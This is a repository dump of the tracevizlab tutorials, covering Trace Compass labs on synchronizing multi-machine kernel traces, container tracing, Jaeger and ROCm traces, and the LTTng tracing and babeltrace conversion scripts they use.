But in a case like ours, where they communicate through the network and we want to analyze the dependencies across the network, it is important that the timestamps of both traces use the same time reference, so that dependent events always happen in the right order (for example, a packet should always be sent before it is received). 137 | 138 | Trace Compass uses a *trace synchronization* algorithm to automatically calculate a formula to transform the timestamps of one trace into the time reference of the other trace. Before synchronizing, let's open the `Synchronization` view, by clicking `Window` -> `Show view` (or typing `Ctrl-3`), then typing and selecting the ``Synchronization (Tracing)`` view. 139 | 140 | Right-click on the experiment and select `Synchronize traces...`. A window will open to select a reference trace. Any one will do in this case, so use the default selected one and click *Finish*. The trace synchronization task will run. It may take a while. At the end, the experiment will be closed. 141 | 142 | ![SynchronizeTraces](screenshots/synchronizeTraces.png "Synchronize traces") 143 | 144 | Open the experiment again; the ``Synchronization`` view should show the result of the synchronization, which is hopefully ``accurate``, along with the number of packets matched and the number of packets used to calculate the formula. 145 | 146 | ![SynchronizationResult](screenshots/synchronizationResults.png "Synchronization Results") 147 | 148 | Look at the ``Event Matches Scatter Graph`` view again. You should now see that both series overlap quite nicely and latencies are always positive. 149 | 150 | ![EventMatchingSync](screenshots/eventMatchingSync.png "Event Matching Latencies Sync") 151 | 152 | All the analyses for this experiment will be re-run now that the traces are synchronized, and this time the timestamps will use the same time reference. 153 | 154 | - - - 155 | 156 | ### Task 4: Analyze the requests 157 | 158 | When analyzing experiments with traces from different machines, most views of Trace Compass will simply show data from both traces. For example, the ``Control Flow`` view will show all threads under an element corresponding to the trace name. Since the 2 traced machines are independent, there is little else for most views to do than aggregate the data of both traces. 159 | 160 | Where an experiment really adds value is in calculating the distributed critical path of a thread. Since we traced a web request, with communication between the machines, we can follow the critical path from the client to the server and back to the client. 161 | 162 | Open the ``Control Flow`` view and the ``Critical Flow`` view (either with `Window` -> `Show View`, or ``ctrl-3`` and typing the view name, or expanding the corresponding analysis under the trace, i.e. ``Linux Kernel`` and ``OS Execution Graph``). 163 | 164 | With focus on the ``Control Flow`` view, find the *wget* processes: press ``Ctrl-f`` and type *wget* in the search box. It will select the first *wget* process. Right-click on the process and click on ``Follow wget/``. This will trigger the ``OS Execution Graph`` analysis and, at the end, the distributed critical path for this wget request will be shown. 165 | 166 | The screenshot below shows the critical path of a web request to a drupal web site, showing a lot of communication between apache and mysql.
167 | 168 | ![CriticalPathWgetCold](screenshots/criticalPathWgetCold.png "Critical Path Wget Cold") 169 | 170 | In the *[Tracing wget](../102-tracing-wget-critical-path)* lab, we saw that most of the *wget* critical path was spent waiting on the network. Now with this experiment, that *waiting for network* part is replaced by the server side critical path, where the apache/mariadb processes each play a role. We see a lot of disk access. This request had not been made in a long time, so its data, PHP code, as well as database content, need to be fetched from disk. 171 | 172 | Now in the ``Control Flow`` view, select the second *wget* process and right-click it to follow the process and calculate its critical path. This time, we see far fewer disk accesses on the server side, and thus a much shorter request than the first time. The data for the request was already in memory, which improves the query time. 173 | 174 | ![CriticalPathWgetHot](screenshots/criticalPathWgetHot.png "Critical Path Wget Hot") 175 | 176 | Now, this analysis was done only with kernel traces from the client and server. We can clearly see the network and disk accesses on the critical path. What a simple kernel trace does not say is whether the time improvement of the second request is only due to in-memory request data, or if the web application also did something to help increase the speed of the second query. Is there some mechanism in the application that improved the query time, or is it simply OS-related? Adding some userspace traces to this experiment could help dig deeper into the userspace parts of the request, showing what was actually running and which tasks in the application made the database requests. For complex web requests made from a browser, for instance, we could even have client side instrumentation that would tell us which browser tasks were responsible for the various http queries, etc. The possible userspace traces to add to this kind of analysis are as numerous and varied as the request frameworks and applications themselves. 177 | 178 | - - - 179 | ### References: 180 | 181 | [Trace synchronization algorithm](http://dmct.dorsal.polymtl.ca/sites/dmct.dorsal.polymtl.ca/files/Jabbarifar-Dec6.pdf) 182 | 183 | **Additional notes on synchronization**: 184 | 185 | Note that the trace synchronization algorithm used in Trace Compass computes a linear formula to transform the timestamps. It is only an approximation, sufficient for the analyses, as computer clocks do not keep this linear correlation forever: after a while, a drift may appear between the clocks and invalidate the linear formula. It means that at some point, it will be impossible to compute a linear formula covering the whole duration of the traces and the synchronization will be marked as ``failed``. Depending on the hardware, the approximation here can be valid for trace durations varying from minutes to hours. 186 | 187 | When dealing with virtual machines, the synchronization approach described here is rarely successful, even for traces of a few seconds; the drift factor comes into play very quickly. Luckily, in those cases, other approaches are available. See [this blog post](http://versatic.net/tracecompass/synchronization/2018/01/15/synchronization-and-ntp.html) for more details.
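To make the note above a bit more concrete, here is a minimal sketch of what such a linear formula looks like (the notation below is ours, not something defined by this lab). The timestamps *t* of one trace are remapped into the reference trace's clock as

$$ t' = a \cdot t + b $$

where the slope *a* accounts for the relative clock drift and the offset *b* for the initial clock difference. The synchronization picks *a* and *b* such that, for every matched pair of packet events, the transformed send timestamp comes before the corresponding receive timestamp; when no such *a* and *b* exist over the whole duration of the traces (because the drift is not constant), the synchronization is reported as ``failed``, as explained above.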
188 | 189 | - - - 190 | 191 | #### Next 192 | 193 | * [Tracing Containers](../302-system-tracing-containers) 194 | or 195 | * [Jaeger OpenTracing Traces](../303-jaeger-opentracing-traces) to see how Open Tracing traces can be used to add userspace information to this kind of experiment 196 | * [Back](../) for more options 197 | -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/criticalPathWgetCold.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/criticalPathWgetCold.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/criticalPathWgetHot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/criticalPathWgetHot.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/eventMatchingNoSync.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/eventMatchingNoSync.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/eventMatchingSync.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/eventMatchingSync.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/importExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/importExperiment.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/openAsExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/openAsExperiment.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/openExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/openExperiment.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/synchronizationResults.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/synchronizationResults.png 
-------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/screenshots/synchronizeTraces.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/301-tracing-multiple-machines/screenshots/synchronizeTraces.png -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/scripts/payload: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | SITE=$1 4 | 5 | wget $SITE 6 | sleep 1 7 | wget $SITE 8 | -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/scripts/setupKernelTrace: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | NAME=$1 4 | 5 | if [ -z "$NAME" ] 6 | then 7 | NAME=trace_$(date +"%y%m%d_%H%M") 8 | fi 9 | 10 | lttng create --output ~/lttng-traces/$NAME 11 | lttng enable-channel --kernel --num-subbuf 8 --subbuf-size 1024K more-subbuf 12 | # scheduling 13 | lttng enable-event -k --channel more-subbuf sched_switch,sched_waking,sched_pi_setprio,sched_process_fork,sched_process_exit,sched_process_free,sched_wakeup 14 | lttng enable-event -k --channel more-subbuf irq_softirq_entry,irq_softirq_raise,irq_softirq_exit 15 | lttng enable-event -k --channel more-subbuf irq_handler_entry,irq_handler_exit 16 | lttng enable-event -k --channel more-subbuf --syscall --all 17 | lttng enable-event -k --channel more-subbuf lttng_statedump_process_state,lttng_statedump_start,lttng_statedump_end,lttng_statedump_network_interface,lttng_statedump_block_device,lttng_statedump_interrupt 18 | # Block I/O 19 | lttng enable-event -k --channel more-subbuf block_rq_complete,block_rq_insert,block_rq_issue 20 | lttng enable-event -k --channel more-subbuf block_bio_frontmerge,sched_migrate,sched_migrate_task 21 | # cpu related 22 | lttng enable-event -k --channel more-subbuf power_cpu_frequency 23 | # network events 24 | lttng enable-event -k --channel more-subbuf net_dev_queue,netif_receive_skb,net_if_receive_skb 25 | # timer events 26 | lttng enable-event -k --channel more-subbuf timer_hrtimer_start,timer_hrtimer_cancel,timer_hrtimer_expire_entry,timer_hrtimer_expire_exit 27 | # Additional events for wifi 28 | #lttng enable-event -k --channel more-subbuf --function netif_receive_skb_internal netif_receive_skb_internal 29 | #lttng enable-event -k --channel more-subbuf --function do_IRQ do_IRQ 30 | -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/scripts/traceClientServer: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | USER=$1 4 | SERVER=$2 5 | URL=$3 6 | if [ -z "$USER" ] || [ -z "$SERVER" ] || [ -z "$URL" ] 7 | then 8 | echo "Usage: ./traceClientServer " 9 | echo "" 10 | echo "Example: ./traceClientServer myUser 5.5.5.2 http://www.polymtl.ca" 11 | exit 0 12 | fi 13 | 14 | TRACE_NAME=serverTrace 15 | 16 | # Start tracing on the server side through ssh 17 | ssh $USER@$SERVER ./setupKernelTrace $TRACE_NAME 18 | ssh $USER@$SERVER lttng start 19 | # Record the client payload 20 | # If the client is a machine with wifi, replace this call to a full manual setup 21 | # of the kernel trace and uncomment the lines for the additional kernel --function lines 22 | lttng-record-trace ./payload 
$URL 23 | # Stop tracing the server 24 | ssh $USER@$SERVER lttng destroy 25 | 26 | # Get the trace from the server 27 | rsync -avz $USER@$SERVER:~/lttng-traces/$TRACE_NAME ./ 28 | -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/README.md: -------------------------------------------------------------------------------- 1 | ## System Tracing and Containers 2 | 3 | In this lab, we will see the specificities of containers when it comes to system tracing, and what Trace Compass can show about them. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. 6 | 7 | - - - 8 | 9 | ### Task 1: Understanding containers and system tracing 10 | 11 | Containers are a software scheme that isolates runtime environments from other containers and from the environment hosting them. They have been compared to a `chroot` on steroids, where whole systems can run in complete isolation. A container is much lighter than a virtual machine because it shares a lot of resources with its host: it does not need a complete OS installation on the side, and its storage is often directly on the host system, so there is no need to assign disk files to the container. 12 | 13 | One of the resources shared with the host is **the kernel**. There is one kernel for all the containers running on the machine. It is thus impossible for the container to do anything specific to the kernel, like installing modules or... tracing. So how can we trace containers? Simply put, by tracing the host. But tracing the host records everything that happens on the system, i.e. the container we're interested in as well as all the other ones. 14 | 15 | At the kernel level, containerization is managed using `cgroups` and `namespaces`. Processes and threads are assigned to cgroups and namespaces. By analyzing those associations, we can get a picture of our system's containerization. Namespaces can be nested within other namespaces. 16 | 17 | Since containers are managed at a very low level in the kernel, *tracing containers* does not require any additional modules: all the information is already in the trace, at least with `LTTng`. `ftrace` and `perf` do not seem to have the proper event fields. 18 | 19 | - - - 20 | 21 | ### Task 2: Get a Trace for Containers 22 | 23 | If you have access to a machine with containers, you may obtain a trace of that machine from the host itself. See the [trace recording lab](../003-record-kernel-trace-lttng/) for instructions on how to record a trace. 24 | 25 | The `namespace` information is important to match threads and processes to containers. This information is available when forking a process, so in the `sched_process_fork` event. But for the processes that are already started at the beginning of the trace, one needs the `lttng_statedump_process_state` event, which advertises the namespaces and virtual TIDs of each thread in each of those namespaces. 26 | 27 | For a test trace, the `httpServer` trace of the [previous lab](../301-tracing-multiple-machines), in the `301-tracing-multiple-machines` directory, traced a web server in a Docker container, so this trace can be used for this lab. 28 | 29 | - - - 30 | 31 | ### Task 3: Install the Trace Compass Plugin for Container Analysis 32 | 33 | To obtain additional views in Trace Compass for container analysis, you need to install the `Virtual Machine and Container Analysis (Incubator)` feature from the *Tools* -> *Add-ons...* menu and click *Finish*.
34 | 35 | ![InstallVMPlugin](screenshots/installVMPlugin.png "Install Virtual Machine Plugin") 36 | 37 | - - - 38 | 39 | ### Task 4: Open the Trace as "Virtual Machine Experiment (incubator)" 40 | 41 | The *Virtual Machine and Container* analyses are available for the *Virtual Machine* experiment type. So even though there is only one trace, you still need to open it as an experiment. 42 | 43 | Import the trace like you would any other trace, then, in the `Project Explorer`, right-click on the trace and select *Open as Experiment...* -> *Virtual Machine Experiment (incubator)*. It will open the trace, and you can see it under the *Experiments* folder. It will have the same name as the trace that's inside. 44 | 45 | ![VirtualMachineExperiment](screenshots/vmExperimentContainer.png "Virtual Machine Experiment For Containers") 46 | 47 | - - - 48 | 49 | ### Task 5: View the container status 50 | 51 | Expand the experiment you just opened in the `Project Explorer`, expand the `Views` item and `Fused Virtual Machine Analysis (incubator)`. Open the `Virtual Resources (incubator)` view. 52 | 53 | This view shows the usage of the physical resources (CPUs) by the various levels of containers/virtualization. The first level shows everything that happens on the physical CPUs. Lower down in the view is the *Container* item, under which would appear all containers, sorted hierarchically (if there are nested containers). Each entry under the *Container* item shows the usage of the physical resources **by that container**. 54 | 55 | ![VirtualResourcesContainer](screenshots/virtualResourcesContainer.png "Virtual Resources Container") 56 | 57 | We can highlight the usage of a single container by clicking on the *Select Machine* button and checking the container to highlight. 58 | 59 | ![SelectContainer](screenshots/selectContainer.png "Select Container") 60 | 61 | ![VirtualResourcesContainerHighlighted](screenshots/virtualResourcesContainerHighlighted.png "Virtual Resources Container Highlighted") 62 | 63 | When we zoom in on one of the zones where there's a bit more activity in the container, we see the `apache2` and `mysqld` processes running. In the tooltip, we see the various TIDs of each thread at the different levels of nesting. The following screenshot shows a mysqld state, where the real physical *TID* of the thread is 9910, which is the TID we should look for in the `Control Flow` view, for instance, to get a critical path. But the *vTID* shows the TID from the container's perspective, so if we ssh'd into the container, we would recognize this process as TID 894. 64 | 65 | ![VirtualResourcesZoomIn](screenshots/virtualResourcesZoomIn.png "Virtual Resources Container Zooming In") 66 | 67 | - - - 68 | 69 | ### Conclusion 70 | 71 | This lab has shown the current state of Trace Compass with regard to containers. It can show how physical CPUs are being used by a container, and can thus also show in the same view what is happening on the machine outside the containers. So, for instance, we can analyze why a container is slow and see whether other containers or host processes were contending for the resources, etc. 72 | 73 | More work on containers is under way. Students at École Polytechnique are working on showing the resource usage with respect to the cgroup associated with a container. One could limit physical resource consumption using cgroups, and we want to show the status of the container with regard to those limits.
Also, we may not be able to do kernel tracing in a container, but userspace tracing can be done, and could interact with lttng sessiond to exchange information that is not available to the host, etc. 74 | -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/installVMPlugin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/installVMPlugin.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/selectContainer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/selectContainer.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/virtualResourcesContainer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/virtualResourcesContainer.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/virtualResourcesContainerHighlighted.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/virtualResourcesContainerHighlighted.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/virtualResourcesZoomIn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/virtualResourcesZoomIn.png -------------------------------------------------------------------------------- /labs/302-system-tracing-containers/screenshots/vmExperimentContainer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/302-system-tracing-containers/screenshots/vmExperimentContainer.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/README.md: -------------------------------------------------------------------------------- 1 | ## Importing and Analysing Jaeger Traces in Trace Compass 2 | 3 | In this lab, you will learn to use Trace Compass to upload and analyse Jaeger traces, obtained from distributed applications instrumented with OpenTracing API. Jaeger already provides a very good visualization of those traces, but with TraceCompass, those traces can be analyzed along with other system and application traces. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. You can follow the [Installing TraceCompass](../006-installing-tracecompass) lab or read the [TraceCompass web site](https://tracecompass.org) for more information. This lab is not a tutorial about OpenTracing or Jaeger. 
It assumes that you already know about them, but it provides all the necessary material to use Trace Compass with example traces, without having access to a Jaeger infrastructure. 6 | 7 | - - - 8 | 9 | ### Task 1: Tracing with Jaeger 10 | 11 | All you need to know to start tracing can be found on the Jaeger Tracing website. 12 | 13 | [Getting started with Jaeger](https://www.jaegertracing.io/docs/getting-started/) 14 | 15 | - - - 16 | 17 | ### Task 2: Installing Open Tracing Plug-in 18 | 19 | You can install the *Open Tracing* trace type in *Tools* -> *Add-ons...*. Check the `Trace Compass opentracing (incubation)` feature and click *Finish*. Follow the instructions on screen. 20 | 21 | ![AddsOn](screenshots/installPlugIn.png "Trace Compass Install Plug In") 22 | 23 | - - - 24 | 25 | ### Task 3: Fetching Jaeger Traces 26 | 27 | Once you have Jaeger running and have recorded some traces, you can fetch those traces directly into Trace Compass. All you need to do is right-click on the Traces folder in the Project Explorer. 28 | 29 | ![RightClickMenu](screenshots/rightClickMenu.png "Trace Compass Traces Menu") 30 | 31 | You will be able to set all the filters you want to apply to your trace request. Once you click the fetch button, you will see a list of traces from which you can select the ones you want to import. 32 | 33 | ![FetchWindow](screenshots/fetchWindow.png "Trace Compass Fetch Jaeger Window") 34 | 35 | Once you click *Finish*, your traces will be imported into your workspace. 36 | 37 | ![FetchedTraces](screenshots/fetchedTraces.png "Trace Compass Fetched Traces") 38 | 39 | You can also open one of the traces in the `303-jaeger-opentracing-traces` directory in the trace archive of this tutorial. 40 | 41 | - - - 42 | 43 | ### Task 4: Exploring the perspective components 44 | 45 | When you open an Open Tracing trace (double-click on any imported trace), you should obtain a view that looks like this. 46 | 47 | ![Perspective](screenshots/perspective.png "Trace Compass Open Tracing Perspective") 48 | 49 | The Open Tracing perspective contains: 50 | 51 | - Project Explorer: List of your experiments as well as your traces. 52 | - Spans Life View: Time graph representation of the spans' relationships. 53 | - Events Table: Information about every event as well as every span in the trace. Equivalent of the Jaeger "Spans List". 54 | - Histogram: Overview of the span occurrences over time. 55 | 56 | - - - 57 | 58 | ### Task 5: Analysing an Open Tracing Trace 59 | 60 | The main view is the `Span Life` view. It provides an overview of the spans. On the left of the view, we can see the list of spans aggregated based on the child-parent relationships between the spans. You can also see a red circle next to some span names, representing an error tag. Different symbols are displayed on the spans where there are logs. Each symbol represents a certain type of log. For example, `X`'s are errors. If you place your cursor over a log, you will see the information relative to this particular log. 61 | 62 | ![SpanLifeView](screenshots/spanLifeView.png "Trace Compass Span Life View") 63 | 64 | You can access the legend via the legend button on top of the Span Life View. You have the possibility to change the color and the size of the different log symbols. 65 | 66 | ![Legend](screenshots/legend.png "Trace Compass Span Life Legend") 67 | 68 | - - - 69 | 70 | ### Conclusion 71 | 72 | This lab shows the work that has been done to integrate applications instrumented with the OpenTracing API into Trace Compass.
Jeager is the provider of the traces in our case. With system traces to augment this data, we could know what is happening during the spans. There is a lot of future work still to do for this feature. Feedback is welcome. 73 | -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/fetchWindow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/fetchWindow.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/fetchedTraces.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/fetchedTraces.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/installPlugIn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/installPlugIn.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/legend.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/legend.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/perspective.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/perspective.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/rightClickMenu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/rightClickMenu.png -------------------------------------------------------------------------------- /labs/303-jaeger-opentracing-traces/screenshots/spanLifeView.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/303-jaeger-opentracing-traces/screenshots/spanLifeView.png -------------------------------------------------------------------------------- /labs/304-rocm-traces/README.md: -------------------------------------------------------------------------------- 1 | ## Tracing and Analysing ROCm traces in Trace Compass 2 | 3 | This tutorial will guide you through getting a trace with ROC-profiler and ROC-tracer and opening it with the Theia-trace-extensions. 4 | 5 | *Disclaimer*: A lot of tools and commands are subject to change, thus this tutorial might not be up-to-date. 
6 | 7 | *Pre-requisites*: 8 | - Have ROCm installed with a [compatible GPU](https://github.com/RadeonOpenCompute/ROCm#Hardware-and-Software-Support) with ROC-profiler and ROC-tracer. You can follow the [ROCm Installation](https://rocmdocs.amd.com/en/latest/Installation_Guide/Installation-Guide.html) guide to get everything installed. 9 | - Have babeltrace2 and python3-bt2 installed. Once you have added the LTTng ppa, you will be able to install python3-bt2 through apt. [Get babeltrace](https://babeltrace.org/#bt2-get) 10 | - Java 11 11 | Ubuntu: `apt-get install openjdk-11-jdk` 12 | Fedora: `dnf install java-11-openjdk.x86_64` 13 | - If you intend to use the Theia trace extension, you will need to install the [pre-requisites for the Theia IDE](https://github.com/eclipse-theia/theia/blob/master/doc/Developing.md#prerequisites) 14 | 15 | - - - 16 | 17 | ### Task 1: Tracing with ROC-tracer and ROC-profiler 18 | 19 | ROCm comes with two profiling tools, [ROC-profiler]() and [ROC-tracer](). Both are driven by the same rocprof script. To get a trace, you just need to run a program that uses the ROCm stack; it can be a deep learning application that uses the ROCm PyTorch build or a C++ program that uses HIP kernels. If you need more details, you can look at [AMD's documentation](https://rocmdocs.amd.com/en/latest/ROCm_Tools/ROCm-Tools.html). In this tutorial we will focus on tracing and not on performance counters. 20 | There are three types of events: activity events, API events and user annotations. The activity events are all the GPU-related events, such as memory transfers or kernel executions. The API events are tracepoints at the beginning and end of every API function. The API can be HSA, HIP or KFD. Finally, you can place your own tracepoints in your application using the roctx library; they will generate user annotation events. 21 | To get a trace that records HIP API calls using rocprof, you can run the following command: 22 | ``` 23 | $ rocprof --hip-trace <your application> 24 | ``` 25 | This will generate 'results' files. You can use some of these with automated scripts; the file that is useful for generating a CTF trace is the 'results.db' file. If you want a different name for these files, you can use the '-o' parameter. 26 | 27 | ### Task 2: Generate a CTF trace using babeltrace 28 | 29 | In the scripts folder, two scripts are present: ctftrace.py and bt_plugin_rocm.py. These files use babeltrace to convert the SQLite database file obtained in the previous task into a CTF trace readable by Trace Compass. 30 | ``` 31 | $ python3 ctftrace.py results.db 32 | ``` 33 | Generating the CTF trace can take some time if your trace file is over 500 MB. 34 | 35 | ### Task 3: Run the Theia trace extension 36 | 37 | You can also open the trace with [Trace Compass](../006-installing-tracecompass/), but we will not cover that use case in this tutorial. 38 | 39 | To open the trace with the Theia-trace-extension, you will need to build the example application. We will explain how to do it here, but for reference, here is a link to the [official instructions](https://github.com/theia-ide/theia-trace-extension#build-the-extension-and-example-application). 40 | 41 | 1. Clone the theia-trace-extension repository: `git clone https://github.com/theia-ide/theia-trace-extension.git` 42 | 2. `cd theia-trace-extension` 43 | 3. Download the Trace Compass Server: `yarn download:server` 44 | 4. Build the application: `yarn` 45 | 5. 
Run the browser app: `yarn start:browser` 46 | 47 | ### Task 4: Opening the trace with the Theia trace extension 48 | 49 | ![theia-trace-extension-open-trace](https://raw.githubusercontent.com/tuxology/tracevizlab/master/labs/304-rocm-traces/screenshots/openATrace.gif) -------------------------------------------------------------------------------- /labs/304-rocm-traces/screenshots/openATrace.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/304-rocm-traces/screenshots/openATrace.gif -------------------------------------------------------------------------------- /labs/304-rocm-traces/scripts/bt_plugin_rocm.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module is a source plugin for babeltrace 2 to read traces from ROC-tracer and ROC-profiler. 3 | 4 | To add or edit an event type, you have to : 5 | - Add/Edit a parsing function which takes the row as parameters. 6 | - Add/Edit the SQL table name in the table_name_to_event_type dictionary associated with the event type. 7 | - Add/Edit an entry into the event_types dictionary filling in get_row_func and the fields keys. 8 | 9 | If you have fields that are optional for the event type, you need to: 10 | - Add the added_field parameters to the parsing function 11 | - Add the fields with the add_optional_fields function in the __init__ method of the RocmSource class. 12 | """ 13 | 14 | import bt2 15 | import os 16 | import uuid 17 | import sys 18 | import sqlite3 19 | import time 20 | from heapq import heappush, heappop 21 | 22 | 23 | def get_compute_kernel_hsa_row(row, added_fields): 24 | added_fields = { field: int(row[field]) for field in added_fields } 25 | return ( 26 | int(row["BeginNs"]), 27 | int(row["EndNs"]), 28 | { 29 | **added_fields, 30 | "kernel_name" : row["KernelName"], 31 | "gpu_id": int(row["gpu-id"]), 32 | "queue_id": int(row["queue-id"]), 33 | "kernel_dispatch_id": int(row["Index"]), 34 | "pid": int(row["pid"]), 35 | "tid": int(row["tid"]), 36 | "grd": int(row["grd"]), 37 | "wgr": int(row["wgr"]), 38 | "lds": int(row["lds"]), 39 | "scr": int(row["scr"]), 40 | "vgpr": int(row["vgpr"]), 41 | "sgpr": int(row["sgpr"]), 42 | "fbar": int(row["fbar"]), 43 | "sig": row["sig"], 44 | "obj": row["obj"], 45 | "dipatch_time": int(row["DispatchNs"]), 46 | "complete_time": int(row["CompleteNs"]), 47 | } 48 | ) 49 | 50 | def get_hcc_ops_row(row): 51 | return ( 52 | int(row["BeginNs"]), 53 | int(row["EndNs"]), 54 | { 55 | "name": row["Name"], 56 | "queue_id": int(row["queue-id"]), 57 | "tid": int(row["tid"]), 58 | "pid": int(row["proc-id"]), 59 | "stream_id": int(row["dev-id"]), 60 | "index": int(row["Index"]) 61 | } 62 | ) 63 | 64 | def get_async_copy_row(row): 65 | return ( 66 | int(row["BeginNs"]), 67 | int(row["EndNs"]), 68 | { 69 | "pid": int(row["proc-id"]), 70 | "name": "async-copy", 71 | "index": row["Index"] 72 | } 73 | ) 74 | 75 | def get_api_row(row): 76 | return ( 77 | int(row["BeginNs"]), 78 | int(row["EndNs"]), 79 | { 80 | "tid": int(row["tid"]), 81 | "name": row["Name"], 82 | "args": row["args"], 83 | "index": int(row["Index"]) 84 | } 85 | ) 86 | 87 | def get_roctx_row(row): 88 | pass 89 | return ( 90 | int(row["BeginNs"]), 91 | -1, 92 | { 93 | "pid": int(row["pid"]), 94 | "tid": int(row["tid"]), 95 | "name": row["Name"], 96 | } 97 | ) 98 | 99 | 100 | table_name_to_event_type = { 101 | "A": "compute_kernels_hsa", 102 | "OPS": "hcc_ops", 
